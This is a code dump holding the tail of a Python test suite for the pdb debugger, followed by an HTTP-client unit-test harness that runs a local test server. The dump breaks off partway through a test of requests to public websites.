> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... ret = test_function_2('baz')
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[2]>(18)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
import pdb
getattr(pdb.Pdb(nosigint=True), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... it = test_gen()
... try:
... assert next(it) == 0
... next(it)
... except StopIteration as ex:
... assert ex.value == 1
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> assert next(it) == 0
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(6)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... it = test_gen()
... try:
... assert next(it) == 0
... next(it)
... except StopIteration as ex:
... assert ex.value == 1
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> assert next(it) == 0
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(6)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> assert ex.value == 1
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
class PdbTestCase(unittest.TestCase):
def run_pdb(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
cmd = [sys.executable, '-m', 'pdb', filename]
stdout = stderr = None
with subprocess.Popen(cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13210(self):
# invoking "continue" on a non-main thread triggered an exception
# inside signal.signal
# raises SkipTest if python was built without threads
support.import_module('threading')
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb().set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def tearDown(self):
support.unlink(support.TESTFN)
def load_tests(*args):
from test import test_pdb
suites = [unittest.makeSuite(PdbTestCase), doctest.DocTestSuite(test_pdb)]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
